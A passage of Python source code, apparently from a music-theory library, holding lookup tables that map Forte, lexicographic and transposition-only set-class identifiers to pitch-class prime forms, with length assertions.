(6, 13): (0, 1, 3, 4, 6, 7),
(6, 14): (0, 1, 3, 4, 5, 8),
(6, 15): (0, 1, 2, 4, 5, 8),
(6, 16): (0, 1, 4, 5, 6, 8),
(6, 17): (0, 1, 2, 4, 7, 8),
(6, 18): (0, 1, 2, 5, 7, 8),
(6, 19): (0, 1, 3, 4, 7, 8),
(6, 20): (0, 1, 4, 5, 8, 9),
(6, 21): (0, 2, 3, 4, 6, 8),
(6, 22): (0, 1, 2, 4, 6, 8),
(6, 23): (0, 2, 3, 5, 6, 8),
(6, 24): (0, 1, 3, 4, 6, 8),
(6, 25): (0, 1, 3, 5, 6, 8),
(6, 26): (0, 1, 3, 5, 7, 8),
(6, 27): (0, 1, 3, 4, 6, 9),
(6, 28): (0, 1, 3, 5, 6, 9),
(6, 29): (0, 1, 3, 6, 8, 9),
(6, 30): (0, 1, 3, 6, 7, 9),
(6, 31): (0, 1, 3, 5, 8, 9),
(6, 32): (0, 2, 4, 5, 7, 9),
(6, 33): (0, 2, 3, 5, 7, 9),
(6, 34): (0, 1, 3, 5, 7, 9),
(6, 35): (0, 2, 4, 6, 8, 10),
(6, 36): (0, 1, 2, 3, 4, 7),
(6, 37): (0, 1, 2, 3, 4, 8),
(6, 38): (0, 1, 2, 3, 7, 8),
(6, 39): (0, 2, 3, 4, 5, 8),
(6, 40): (0, 1, 2, 3, 5, 8),
(6, 41): (0, 1, 2, 3, 6, 8),
(6, 42): (0, 1, 2, 3, 6, 9),
(6, 43): (0, 1, 2, 5, 6, 8),
(6, 44): (0, 1, 2, 5, 6, 9),
(6, 45): (0, 2, 3, 4, 6, 9),
(6, 46): (0, 1, 2, 4, 6, 9),
(6, 47): (0, 1, 2, 4, 7, 9),
(6, 48): (0, 1, 2, 5, 7, 9),
(6, 49): (0, 1, 3, 4, 7, 9),
(6, 50): (0, 1, 4, 6, 7, 9),
}
assert len(_forte_identifier_to_prime_form) == 137
_lex_identifier_to_prime_form = {
# 0
(0, 1): (),
# 1
(1, 1): (0,),
# 2
(2, 1): (0, 1),
(2, 2): (0, 2),
(2, 3): (0, 3),
(2, 4): (0, 4),
(2, 5): (0, 5),
(2, 6): (0, 6),
# 3
(3, 1): (0, 1, 2),
(3, 2): (0, 1, 3),
(3, 3): (0, 1, 4),
(3, 4): (0, 1, 5),
(3, 5): (0, 1, 6),
(3, 6): (0, 2, 4),
(3, 7): (0, 2, 5),
(3, 8): (0, 2, 6),
(3, 9): (0, 2, 7),
(3, 10): (0, 3, 6),
(3, 11): (0, 3, 7),
(3, 12): (0, 4, 8),
# 4
(4, 1): (0, 1, 2, 3),
(4, 2): (0, 1, 2, 4),
(4, 3): (0, 1, 2, 5),
(4, 4): (0, 1, 2, 6),
(4, 5): (0, 1, 2, 7),
(4, 6): (0, 1, 3, 4),
(4, 7): (0, 1, 3, 5),
(4, 8): (0, 1, 3, 6),
(4, 9): (0, 1, 3, 7),
(4, 10): (0, 1, 4, 5),
(4, 11): (0, 1, 4, 6),
(4, 12): (0, 1, 4, 7),
(4, 13): (0, 1, 4, 8),
(4, 14): (0, 1, 5, 6),
(4, 15): (0, 1, 5, 7),
(4, 16): (0, 1, 5, 8),
(4, 17): (0, 1, 6, 7),
(4, 18): (0, 2, 3, 5),
(4, 19): (0, 2, 3, 6),
(4, 20): (0, 2, 3, 7),
(4, 21): (0, 2, 4, 6),
(4, 22): (0, 2, 4, 7),
(4, 23): (0, 2, 4, 8),
(4, 24): (0, 2, 5, 7),
(4, 25): (0, 2, 5, 8),
(4, 26): (0, 2, 6, 8),
(4, 27): (0, 3, 4, 7),
(4, 28): (0, 3, 5, 8),
(4, 29): (0, 3, 6, 9),
# 5
(5, 1): (0, 1, 2, 3, 4),
(5, 2): (0, 1, 2, 3, 5),
(5, 3): (0, 1, 2, 3, 6),
(5, 4): (0, 1, 2, 3, 7),
(5, 5): (0, 1, 2, 4, 5),
(5, 6): (0, 1, 2, 4, 6),
(5, 7): (0, 1, 2, 4, 7),
(5, 8): (0, 1, 2, 4, 8),
(5, 9): (0, 1, 2, 5, 6),
(5, 10): (0, 1, 2, 5, 7),
(5, 11): (0, 1, 2, 5, 8),
(5, 12): (0, 1, 2, 6, 7),
(5, 13): (0, 1, 2, 6, 8),
(5, 14): (0, 1, 3, 4, 6),
(5, 15): (0, 1, 3, 4, 7),
(5, 16): (0, 1, 3, 4, 8),
(5, 17): (0, 1, 3, 5, 6),
(5, 18): (0, 1, 3, 5, 7),
(5, 19): (0, 1, 3, 5, 8),
(5, 20): (0, 1, 3, 6, 7),
(5, 21): (0, 1, 3, 6, 8),
(5, 22): (0, 1, 3, 6, 9),
(5, 23): (0, 1, 3, 7, 8),
(5, 24): (0, 1, 4, 5, 7),
(5, 25): (0, 1, 4, 5, 8),
(5, 26): (0, 1, 4, 6, 8),
(5, 27): (0, 1, 4, 7, 8),
(5, 28): (0, 1, 4, 7, 9),
(5, 29): (0, 2, 3, 4, 6),
(5, 30): (0, 2, 3, 4, 7),
(5, 31): (0, 2, 3, 5, 7),
(5, 32): (0, 2, 3, 5, 8),
(5, 33): (0, 2, 3, 6, 8),
(5, 34): (0, 2, 4, 5, 8),
(5, 35): (0, 2, 4, 6, 8),
(5, 36): (0, 2, 4, 6, 9),
(5, 37): (0, 2, 4, 7, 9),
(5, 38): (0, 3, 4, 5, 8),
# 6
(6, 1): (0, 1, 2, 3, 4, 5),
(6, 2): (0, 1, 2, 3, 4, 6),
(6, 3): (0, 1, 2, 3, 4, 7),
(6, 4): (0, 1, 2, 3, 4, 8),
(6, 5): (0, 1, 2, 3, 5, 6),
(6, 6): (0, 1, 2, 3, 5, 7),
(6, 7): (0, 1, 2, 3, 5, 8),
(6, 8): (0, 1, 2, 3, 6, 7),
(6, 9): (0, 1, 2, 3, 6, 8),
(6, 10): (0, 1, 2, 3, 6, 9),
(6, 11): (0, 1, 2, 3, 7, 8),
(6, 12): (0, 1, 2, 4, 5, 6),
(6, 13): (0, 1, 2, 4, 5, 7),
(6, 14): (0, 1, 2, 4, 5, 8),
(6, 15): (0, 1, 2, 4, 6, 7),
(6, 16): (0, 1, 2, 4, 6, 8),
(6, 17): (0, 1, 2, 4, 6, 9),
(6, 18): (0, 1, 2, 4, 7, 8),
(6, 19): (0, 1, 2, 4, 7, 9),
(6, 20): (0, 1, 2, 5, 6, 7),
(6, 21): (0, 1, 2, 5, 6, 8),
(6, 22): (0, 1, 2, 5, 7, 8),
(6, 23): (0, 1, 2, 5, 7, 9),
(6, 24): (0, 1, 2, 5, 8, 9),
(6, 25): (0, 1, 2, 6, 7, 8),
(6, 26): (0, 1, 3, 4, 5, 7),
(6, 27): (0, 1, 3, 4, 5, 8),
(6, 28): (0, 1, 3, 4, 6, 7),
(6, 29): (0, 1, 3, 4, 6, 8),
(6, 30): (0, 1, 3, 4, 6, 9),
(6, 31): (0, 1, 3, 4, 7, 8),
(6, 32): (0, 1, 3, 4, 7, 9),
(6, 33): (0, 1, 3, 5, 6, 8),
(6, 34): (0, 1, 3, 5, 6, 9),
(6, 35): (0, 1, 3, 5, 7, 8),
(6, 36): (0, 1, 3, 5, 7, 9),
(6, 37): (0, 1, 3, 5, 8, 9),
(6, 38): (0, 1, 3, 6, 7, 9),
(6, 39): (0, 1, 3, 6, 8, 9),
(6, 40): (0, 1, 4, 5, 6, 8),
(6, 41): (0, 1, 4, 5, 8, 9),
(6, 42): (0, 1, 4, 6, 7, 9),
(6, 43): (0, 2, 3, 4, 5, 7),
(6, 44): (0, 2, 3, 4, 5, 8),
(6, 45): (0, 2, 3, 4, 6, 8),
(6, 46): (0, 2, 3, 4, 6, 9),
(6, 47): (0, 2, 3, 5, 6, 8),
(6, 48): (0, 2, 3, 5, 7, 9),
(6, 49): (0, 2, 4, 5, 7, 9),
(6, 50): (0, 2, 4, 6, 8, 10),
# 7
(7, 1): (0, 1, 2, 3, 4, 5, 6),
(7, 2): (0, 1, 2, 3, 4, 5, 7),
(7, 3): (0, 1, 2, 3, 4, 5, 8),
(7, 4): (0, 1, 2, 3, 4, 6, 7),
(7, 5): (0, 1, 2, 3, 4, 6, 8),
(7, 6): (0, 1, 2, 3, 4, 6, 9),
(7, 7): (0, 1, 2, 3, 4, 7, 8),
(7, 8): (0, 1, 2, 3, 4, 7, 9),
(7, 9): (0, 1, 2, 3, 5, 6, 7),
(7, 10): (0, 1, 2, 3, 5, 6, 8),
(7, 11): (0, 1, 2, 3, 5, 6, 9),
(7, 12): (0, 1, 2, 3, 5, 7, 8),
(7, 13): (0, 1, 2, 3, 5, 7, 9),
(7, 14): (0, 1, 2, 3, 5, 8, 9),
(7, 15): (0, 1, 2, 3, 6, 7, 8),
(7, 16): (0, 1, 2, 3, 6, 8, 9),
(7, 17): (0, 1, 2, 4, 5, 6, 8),
(7, 18): (0, 1, 2, 4, 5, 6, 9),
(7, 19): (0, 1, 2, 4, 5, 7, 8),
(7, 20): (0, 1, 2, 4, 5, 7, 9),
(7, 21): (0, 1, 2, 4, 5, 8, 9),
(7, 22): (0, 1, 2, 4, 6, 7, 8),
(7, 23): (0, 1, 2, 4, 6, 7, 9),
(7, 24): (0, 1, 2, 4, 6, 8, 10),
(7, 25): (0, 1, 2, 4, 6, 8, 9),
(7, 26): (0, 1, 2, 4, 7, 8, 9),
(7, 27): (0, 1, 2, 5, 6, 8, 9),
(7, 28): (0, 1, 3, 4, 5, 6, 8),
(7, 29): (0, 1, 3, 4, 5, 7, 8),
(7, 30): (0, 1, 3, 4, 5, 7, 9),
(7, 31): (0, 1, 3, 4, 6, 7, 9),
(7, 32): (0, 1, 3, 4, 6, 8, 10),
(7, 33): (0, 1, 3, 4, 6, 8, 9),
(7, 34): (0, 1, 3, 5, 6, 7, 9),
(7, 35): (0, 1, 3, 5, 6, 8, 10),
(7, 36): (0, 2, 3, 4, 5, 6, 8),
(7, 37): (0, 2, 3, 4, 5, 7, 9),
(7, 38): (0, 2, 3, 4, 6, 7, 9),
# 8
(8, 1): (0, 1, 2, 3, 4, 5, 6, 7),
(8, 2): (0, 1, 2, 3, 4, 5, 6, 8),
(8, 3): (0, 1, 2, 3, 4, 5, 6, 9),
(8, 4): (0, 1, 2, 3, 4, 5, 7, 8),
(8, 5): (0, 1, 2, 3, 4, 5, 7, 9),
(8, 6): (0, 1, 2, 3, 4, 5, 8, 9),
(8, 7): (0, 1, 2, 3, 4, 6, 7, 8),
(8, 8): (0, 1, 2, 3, 4, 6, 7, 9),
(8, 9): (0, 1, 2, 3, 4, 6, 8, 10),
(8, 10): (0, 1, 2, 3, 4, 6, 8, 9),
(8, 11): (0, 1, 2, 3, 4, 7, 8, 9),
(8, 12): (0, 1, 2, 3, 5, 6, 7, 8),
(8, 13): (0, 1, 2, 3, 5, 6, 7, 9),
(8, 14): (0, 1, 2, 3, 5, 6, 8, 9),
(8, 15): (0, 1, 2, 3, 5, 7, 8, 10),
(8, 16): (0, 1, 2, 3, 5, 7, 8, 9),
(8, 17): (0, 1, 2, 3, 5, 7, 9, 10),
(8, 18): (0, 1, 2, 3, 6, 7, 8, 9),
(8, 19): (0, 1, 2, 4, 5, 6, 7, 9),
(8, 20): (0, 1, 2, 4, 5, 6, 8, 10),
(8, 21): (0, 1, 2, 4, 5, 6, 8, 9),
(8, 22): (0, 1, 2, 4, 5, 7, 8, 10),
(8, 23): (0, 1, 2, 4, 5, 7, 8, 9),
(8, 24): (0, 1, 2, 4, 5, 7, 9, 10),
(8, 25): (0, 1, 2, 4, 6, 7, 8, 10),
(8, 26): (0, 1, 3, 4, 5, 6, 7, 9),
(8, 27): (0, 1, 3, 4, 5, 6, 8, 9),
(8, 28): (0, 1, 3, 4, 6, 7, 9, 10),
(8, 29): (0, 2, 3, 4, 5, 6, 7, 9),
# 9
(9, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8),
(9, 2): (0, 1, 2, 3, 4, 5, 6, 7, 9),
(9, 3): (0, 1, 2, 3, 4, 5, 6, 8, 10),
(9, 4): (0, 1, 2, 3, 4, 5, 6, 8, 9),
(9, 5): (0, 1, 2, 3, 4, 5, 7, 8, 9),
(9, 6): (0, 1, 2, 3, 4, 5, 7, 9, 10),
(9, 7): (0, 1, 2, 3, 4, 6, 7, 8, 9),
(9, 8): (0, 1, 2, 3, 4, 6, 7, 9, 10),
(9, 9): (0, 1, 2, 3, 4, 6, 8, 9, 10),
(9, 10): (0, 1, 2, 3, 5, 6, 7, 8, 10),
(9, 11): (0, 1, 2, 3, 5, 6, 8, 9, 10),
(9, 12): (0, 1, 2, 4, 5, 6, 8, 9, 10),
# 10
(10, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 10),
(10, 2): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9),
(10, 3): (0, 1, 2, 3, 4, 5, 6, 7, 9, 10),
(10, 4): (0, 1, 2, 3, 4, 5, 6, 8, 9, 10),
(10, 5): (0, 1, 2, 3, 4, 5, 7, 8, 9, 10),
(10, 6): (0, 1, 2, 3, 4, 6, 7, 8, 9, 10),
# 11
(11, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10),
# 12
(12, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11),
}
assert len(_lex_identifier_to_prime_form) == 224
_transposition_only_identifier_to_prime_form = {
# 0
(0, 1): (),
# 1
(1, 1): (0),
# 2
(2, 1): (0, 1),
(2, 2): (0, 2),
(2, 3): (0, 3),
(2, 4): (0, 4),
(2, 5): (0, 5),
(2, 6): (0, 6),
# 3
(3, 1): (0, 1, 2),
(3, 2): (0, 1, 3),
(3, 3): (0, 1, 4),
(3, 4): (0, 1, 5),
(3, 5): (0, 1, 6),
(3, 6): (0, 2, 3),
(3, 7): (0, 2, 4),
(3, 8): (0, 2, 5),
(3, 9): (0, 2, 6),
(3, 10): (0, 2, 7),
(3, 11): (0, 3, 4),
(3, 12): (0, 3, 5),
(3, 13): (0, 3, 6),
(3, 14): (0, 3, 7),
(3, 15): (0, 4, 5),
(3, 16): (0, 4, 6),
(3, 17): (0, 4, 7),
(3, 18): (0, 4, 8),
(3, 19): (0, 5, 6),
# 4
(4, 1): (0, 1, 2, 3),
(4, 2): (0, 1, 2, 4),
(4, 3): (0, 1, 2, 5),
(4, 4): (0, 1, 2, 6),
(4, 5): (0, 1, 2, 7),
(4, 6): (0, 1, 3, 4),
(4, 7): (0, 1, 3, 5),
(4, 8): (0, 1, 3, 6),
(4, 9): (0, 1, 3, 7),
(4, 10): (0, 1, 4, 5),
(4, 11): (0, 1, 4, 6),
(4, 12): (0, 1, 4, 7),
(4, 13): (0, 1, 4, 8),
(4, 14): (0, 1, 5, 6),
(4, 15): (0, 1, 5, 7),
(4, 16): (0, 1, 5, 8),
(4, 17): (0, 1, 6, 7),
(4, 18): (0, 2, 3, 4),
(4, 19): (0, 2, 3, 5),
(4, 20): (0, 2, 3, 6),
(4, 21): (0, 2, 3, 7),
(4, 22): (0, 2, 4, 5),
(4, 23): (0, 2, 4, 6),
(4, 24): (0, 2, 4, 7),
(4, 25): (0, 2, 4, 8),
(4, 26): (0, 2, 5, 6),
(4, 27): (0, 2, 5, 7),
(4, 28): (0, 2, 5, 8),
(4, 29): (0, 2, 6, 7),
(4, 30): (0, 2, 6, 8),
(4, 31): (0, 3, 4, 5),
(4, 32): (0, 3, 4, 6),
(4, 33): (0, 3, 4, 7),
(4, 34): (0, 3, 4, 8),
(4, 35): (0, 3, 5, 6),
(4, 36): (0, 3, 5, 7),
(4, 37): (0, 3, 5, 8),
(4, 38): (0, 3, 6, 7),
(4, 39): (0, 3, 6, 8),
(4, 40): (0, 3, 6, 9),
(4, 41): (0, 4, 5, 6),
(4, 42): (0, 4, 5, 7),
(4, 43): (0, 4, 6, 7),
# 5
(5, 1): (0, 1, 2, 3, 4),
(5, 2): (0, 1, 2, 3, 5),
(5, 3): (0, 1, 2, 3, 6),
(5, 4): (0, 1, 2, 3, 7),
(5, 5): (0, 1, 2, 4, 5),
(5, 6): (0, 1, 2, 4, 6),
(5, 7): (0, 1, 2, 4, 7),
(5, 8): (0, 1, 2, 4, 8),
(5, 9): (0, 1, 2, 5, 6),
(5, 10): (0, 1, 2, 5, 7),
(5, 11): (0, 1, 2, 5, 8),
(5, 12): (0, 1, 2, 6, 7),
(5, 13): (0, 1, 2, 6, 8),
(5, 14): (0, 1, 3, 4, 5),
(5, 15): (0, 1, 3, 4, 6),
(5, 16): (0, 1, 3, 4, 7),
(5, 17): (0, 1, 3, 4, 8),
(5, 18): (0, 1, 3, 5, 6),
(5, 19): (0, 1, 3, 5, 7),
(5, 20): (0, 1, 3, 5, 8),
(5, 21): (0, 1, 3, 6, 7),
(5, 22): (0, 1, 3, 6, 8),
(5, 23): (0, 1, 3, 6, 9),
(5, 24): (0, 1, 3, 7, 8),
(5, 25): (0, 1, 4, 5, 6),
(5, 26): (0, 1, 4, 5, 7),
(5, 27): (0, 1, 4, 5, 8),
(5, 28): (0, 1, 4, 6, 7),
(5, 29): (0, 1, 4, 6, 8),
(5, 30): (0, 1, 4, 6, 9),
(5, 31): (0, 1, 4, 7, 8),
(5, 32): (0, 1, 4, 7, 9),
(5, 33): (0, 1, 5, 6, 7),
(5, 34): (0, 1, 5, 7, 8),
(5, 35): (0, 2, 3, 4, 5),
(5, 36): (0, 2, 3, 4, 6),
(5, 37): (0, 2, 3, 4, 7),
(5, 38): (0, 2, 3, 4, 8),
(5, 39): (0, 2, 3, 5, 6),
(5, 40): (0, 2, 3, 5, 7),
(5, 41): (0, 2, 3, 5, 8),
(5, 42): (0, 2, 3, 6, 7),
(5, 43): (0, 2, 3, 6, 8),
(5, 44): (0, 2, 3, 6, 9),
(5, 45): (0, 2, 4, 5, 6),
(5, 46): (0, 2, 4, 5, 7),
(5, 47): (0, 2, 4, 5, 8),
(5, 48): (0, 2, 4, 6, 7),
(5, 49): (0, 2, 4, 6, 8),
(5, 50): (0, 2, 4, 6, 9),
(5, 51): (0, 2, 4, 7, 8),
(5, 52): (0, 2, 4, 7, 9),
(5, 53): (0, 2, 5, 6, 7),
(5, 54): (0, 2, 5, 6, 8),
(5, 55): (0, 2, 5, 7, 8),
(5, 56): (0, 3, 4, 5, 6),
(5, 57): (0, 3, 4, 5, 7),
(5, 58): (0, 3, 4, 5, 8),
(5, 59): (0, 3, 4, 6, 7),
(5, 60): (0, 3, 4, 6, 8),
(5, 61): (0, 3, 4, 7, 8),
(5, 62): (0, 3, 5, 6, 7),
(5, 63): (0, 3, 5, 6, 8),
(5, 64): (0, 3, 5, 7, 8),
(5, 65): (0, 3, 6, 7, 8),
(5, 66): (0, 4, 5, 6, 7),
# 6
(6, 1): (0, 1, 2, 3, 4, 5),
(6, 2): (0, 1, 2, 3, 4, 6),
(6, 3): (0, 1, 2, 3, 4, 7),
(6, 4): (0, 1, 2, 3, 4, 8),
(6, 5): (0, 1, 2, 3, 5, 6),
(6, 6): (0, 1, 2, 3, 5, 7),
(6, 7): (0, 1, 2, 3, 5, 8),
(6, 8): (0, 1, 2, 3, 6, 7),
(6, 9): (0, 1, 2, 3, 6, 8),
(6, 10): (0, 1, 2, 3, 6, 9),
(6, 11): (0, 1, 2, 3, 7, 8),
(6, 12): (0, 1, 2, 4, 5, 6),
(6, 13): (0, 1, 2, 4, 5, 7),
(6, 14): (0, 1, 2, 4, 5, 8),
(6, 15): (0, 1, 2, 4, 6, 7),
(6, 16): (0, 1, 2, 4, 6, 8),
(6, 17): (0, 1, 2, 4, 6, 9),
(6, 18): (0, 1, 2, 4, 7, 8),
(6, 19): (0, 1, 2, 4, 7, 9),
(6, 20): (0, 1, 2, 5, 6, 7),
(6, 21): (0, 1, 2, 5, 6, 8),
(6, 22): (0, 1, 2, 5, 6, 9),
(6, 23): (0, 1, 2, 5, 7, 8),
(6, 24): (0, 1, 2, 5, 7, 9),
(6, 25): (0, 1, 2, 5, 8, 9),
(6, 26): (0, 1, 2, 6, 7, 8),
(6, 27): (0, 1, 3, 4, 5, 6),
(6, 28): (0, 1, 3, 4, 5, 7),
(6, 29): (0, 1, 3, 4, 5, 8),
(6, 30): (0, 1, 3, 4, 6, 7),
(6, 31): (0, 1, 3, 4, 6, 8),
(6, 32): (0, 1, 3, 4, 6, 9),
(6, 33): (0, 1, 3, 4, 7, 8),
(6, 34): (0, 1, 3, 4, 7, 9),
(6, 35): (0, 1, 3, 5, 6, 7),
(6, 36): (0, 1, 3, 5, 6, 8),
(6, 37): (0, 1, 3, 5, 6, 9),
(6, 38): (0, 1, 3, 5, 7, 8),
(6, 39): (0, 1, 3, 5, 7, 9),
(6, 40): (0, 1, 3, 5, 8, 9),
(6, 41): (0, 1, 3, 6, 7, 8),
(6, 42): (0, 1, 3, 6, 7, 9),
(6, 43): (0, 1, 3, 6, 8, 9),
(6, 44): (0, 1, 4, 5, 6, 7),
(6, 45): (0, 1, 4, 5, 6, 8),
(6, 46): (0, 1, 4, 5, 7, 8),
(6, 47): (0, 1, 4, 5, 8, 9),
(6, 48): (0, 1, 4, 6, 7, 8),
(6, 49): (0, 1, 4, 6, 7, 9),
(6, 50): (0, 1, 4, 6, 8, 9),
(6, 51): (0, 2, 3, 4, 5, 6),
(6, 52): (0, 2, 3, 4, 5, 7),
(6, 53): (0, 2, 3, 4, 5, 8),
(6, 54): (0, 2, 3, 4, 6, 7),
(6, 55): (0, 2, 3, 4, 6, 8),
(6, 56): (0, 2, 3, 4, 6, 9),
(6, 57): (0, 2, 3, 4, 7, 8),
(6, 58): (0, 2, 3, 4, 7, 9),
(6, 59): (0, 2, 3, 5, 6, 7),
(6, 60): (0, 2, 3, 5, 6, 8),
(6, 61): (0, 2, 3, 5, 6, 9),
(6, 62): (0, 2, 3, 5, 7, 8),
(6, 63): (0, 2, 3, 5, 7, 9),
(6, 64): (0, 2, 3, 6, 7, 8),
(6, 65): (0, 2, 3, 6, 8, 9),
(6, 66): (0, 2, 4, 5, 6, 7),
(6, 67): (0, 2, 4, 5, 6, 8),
(6, 68): (0, 2, 4, 5, 6, 9),
(6, 69): (0, 2, 4, 5, 7, 8),
(6, 70): (0, 2, 4, 5, 7, 9),
(6, 71): (0, 2, 4, 6, 7, 8),
(6, 72): (0, 2, 4, 6, 7, 9),
(6, 73): (0, 2, 4, 6, 8, 10),
(6, 74): (0, 2, 4, 6, 8, 9),
(6, 75): (0, 2, 5, 6, 7, 8),
(6, 76): (0, 3, 4, 5, 6, 7),
(6, 77): (0, 3, 4, 5, 6, 8),
(6, 78): (0, 3, 4, 5, 7, 8),
(6, 79): (0, 3, 4, 6, 7, 8),
(6, 80): (0, 3, 5, 6, 7, 8),
# 7
(7, 1): (0, 1, 2, 3, 4, 5, 6),
(7, 2): (0, 1, 2, 3, 4, 5, 7),
(7, 3): (0, 1, 2, 3, 4, 5, 8),
(7, 4): (0, 1, 2, 3, 4, 6, 7),
(7, 5): (0, 1, 2, 3, 4, 6, 8),
(7, 6): (0, 1, 2, 3, 4, 6, 9),
(7, 7): (0, 1, 2, 3, 4, 7, 8),
(7, 8): (0, 1, 2, 3, 4, 7, 9),
(7, 9): (0, 1, 2, 3, 5, 6, 7),
(7, 10): (0, 1, 2, 3, 5, 6, 8),
(7, 11): (0, 1, 2, 3, 5, 6, 9),
(7, 12): (0, 1, 2, 3, 5, 7, 8),
(7, 13): (0, 1, 2, 3, 5, 7, 9),
(7, 14): (0, 1, 2, 3, 5, 8, 9),
(7, 15): (0, 1, 2, 3, 6, 7, 8),
(7, 16): (0, 1, 2, 3, 6, 7, 9),
(7, 17): (0, 1, 2, 3, 6, 8, 9),
(7, 18): (0, 1, 2, 4, 5, 6, 7),
(7, 19): (0, 1, 2, 4, 5, 6, 8),
(7, 20): (0, 1, 2, 4, 5, 6, 9),
(7, 21): (0, 1, 2, 4, 5, 7, 8),
(7, 22): (0, 1, 2, 4, 5, 7, 9),
(7, 23): (0, 1, 2, 4, 5, 8, 9),
(7, 24): (0, 1, 2, 4, 6, 7, 8),
(7, 25): (0, 1, 2, 4, 6, 7, 9),
(7, 26): (0, 1, 2, 4, 6, 8, 10),
(7, 27): (0, 1, 2, 4, 6, 8, 9),
(7, 28): (0, 1, 2, 4, 7, 8, 9),
(7, 29): (0, 1, 2, 5, 6, 7, 8),
(7, 30): (0, 1, 2, 5, 6, 8, 9),
(7, 31): (0, 1, 2, 5, 7, 8, 9),
(7, 32): (0, 1, 3, 4, 5, 6, 7),
(7, 33): (0, 1, 3, 4, 5, 6, 8),
(7, 34): (0, 1, 3, 4, 5, 6, 9),
(7, 35): (0, 1, 3, 4, 5, 7, 8),
(7, 36): (0, 1, 3, 4, 5, 7, 9),
(7, 37): (0, 1, 3, 4, 5, 8, 9),
(7, 38): (0, 1, 3, 4, 6, 7, 8),
(7, 39): (0, 1, 3, 4, 6, 7, 9),
(7, 40): (0, 1, 3, 4, 6, 8, 10),
(7, 41): (0, 1, 3, 4, 6, 8, 9),
(7, 42): (0, 1, 3, 5, 6, 7, 8),
(7, 43): (0, 1, 3, 5, 6, 7, 9),
(7, 44): (0, 1, 3, 5, 6, 8, 10),
(7, 45): (0, 1, 3, 5, 6, 8, 9),
(7, 46): (0, 1, 3, 5, 7, 8, 9),
(7, 47): (0, 1, 4, 5, 6, 7, 8),
(7, 48): (0, 1, 4, 6, 7, 8, 9),
(7, 49): (0, 2, 3, 4, 5, 6, 7),
(7, 50): (0, 2, 3, 4, 5, 6, 8),
(7, 51): (0, 2, 3, 4, 5, 6, 9),
(7, 52): (0, 2, 3, 4, 5, 7, 8),
(7, 53): (0, 2, 3, 4, 5, 7, 9),
(7, 54): (0, 2, 3, 4, 6, 7, 8),
(7, 55): (0, 2, 3, 4, 6, 7, 9),
(7, 56): (0, 2, 3, 4, 6, 8, 9),
(7, 57): (0, 2, 3, 5, 6, 7, 8),
(7, 58): (0, 2, 3, 5, 6, 7, 9),
(7, 59): (0, 2, 3, 5, 6, 8, 9),
(7, 60): (0, 2, 3, 5, 7, 8, 9),
(7, 61): (0, 2, 4, 5, 6, 7, 8),
(7, 62): (0, 2, 4, 5, 6, 7, 9),
(7, 63): (0, 2, 4, 5, 6, 8, 9),
(7, 64): (0, 2, 4, 5, 7, 8, 9),
(7, 65): (0, 2, 4, 6, 7, 8, 9),
(7, 66): (0, 3, 4, 5, 6, 7, 8),
# 8
(8, 1): (0, 1, 2, 3, 4, 5, 6, 7),
(8, 2): (0, 1, 2, 3, 4, 5, 6, 8),
(8, 3): (0, 1, 2, 3, 4, 5, 6, 9),
(8, 4): (0, 1, 2, 3, 4, 5, 7, 8),
(8, 5): (0, 1, 2, 3, 4, 5, 7, 9),
(8, 6): (0, 1, 2, 3, 4, 5, 8, 9),
(8, 7): (0, 1, 2, 3, 4, 6, 7, 8),
(8, 8): (0, 1, 2, 3, 4, 6, 7, 9),
(8, 9): (0, 1, 2, 3, 4, 6, 8, 10),
(8, 10): (0, 1, 2, 3, 4, 6, 8, 9),
(8, 11): (0, 1, 2, 3, 4, 7, 8, 9),
(8, 12): (0, 1, 2, 3, 5, 6, 7, 8),
(8, 13): (0, 1, 2, 3, 5, 6, 7, 9),
(8, 14): (0, 1, 2, 3, 5, 6, 8, 10),
(8, 15): (0, 1, 2, 3, 5, 6, 8, 9),
(8, 16): (0, 1, 2, 3, 5, 7, 8, 10),
(8, 17): (0, 1, 2, 3, 5, 7, 8, 9),
(8, 18): (0, 1, 2, 3, 5, 7, 9, 10),
(8, 19): (0, 1, 2, 3, 6, 7, 8, 9),
(8, 20): (0, 1, 2, 4, 5, 6, 7, 8),
(8, 21): (0, 1, 2, 4, 5, 6, 7, 9),
(8, 22): (0, 1, 2, 4, 5, 6, 8, 10),
(8, 23): (0, 1, 2, 4, 5, 6, 8, 9),
(8, 24): (0, 1, 2, 4, 5, 7, 8, 10),
(8, 25): (0, 1, 2, 4, 5, 7, 8, 9),
(8, 26): (0, 1, 2, 4, 5, 7, 9, 10),
(8, 27): (0, 1, 2, 4, 6, 7, 8, 10),
(8, 28): (0, 1, 2, 4, 6, 7, 8, 9),
(8, 29): (0, 1, 2, 4, 6, 7, 9, 10),
(8, 30): (0, 1, 3, 4, 5, 6, 7, 8),
(8, 31): (0, 1, 3, 4, 5, 6, 7, 9),
(8, 32): (0, 1, 3, 4, 5, 6, 8, 9),
(8, 33): (0, 1, 3, 4, 5, 7, 8, 9),
(8, 34): (0, 1, 3, 4, 6, 7, 8, 9),
(8, 35): (0, 1, 3, 4, 6, 7, 9, 10),
(8, 36): (0, 1, 3, 5, 6, 7, 8, 9),
(8, 37): (0, 2, 3, 4, 5, 6, 7, 8),
(8, 38): (0, 2, 3, 4, 5, 6, 7, 9),
(8, 39): (0, 2, 3, 4, 5, 6, 8, 9),
(8, 40): (0, 2, 3, 4, 5, 7, 8, 9),
(8, 41): (0, 2, 3, 4, 6, 7, 8, 9),
(8, 42): (0, 2, 3, 5, 6, 7, 8, 9),
(8, 43): (0, 2, 4, 5, 6, 7, 8, 9),
# 9
(9, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8),
(9, 2): (0, 1, 2, 3, 4, 5, 6, 7, 9),
(9, 3): (0, 1, 2, 3, 4, 5, 6, 8, 10),
(9, 4): (0, 1, 2, 3, 4, 5, 6, 8, 9),
(9, 5): (0, 1, 2, 3, 4, 5, 7, 8, 10),
(9, 6): (0, 1, 2, 3, 4, 5, 7, 8, 9),
(9, 7): (0, 1, 2, 3, 4, 5, 7, 9, 10),
(9, 8): (0, 1, 2, 3, 4, 6, 7, 8, 10),
(9, 9): (0, 1, 2, 3, 4, 6, 7, 8, 9),
(9, 10): (0, 1, 2, 3, 4, 6, 7, 9, 10),
(9, 11): (0, 1, 2, 3, 4, 6, 8, 9, 10),
(9, 12): (0, 1, 2, 3, 5, 6, 7, 8, 10),
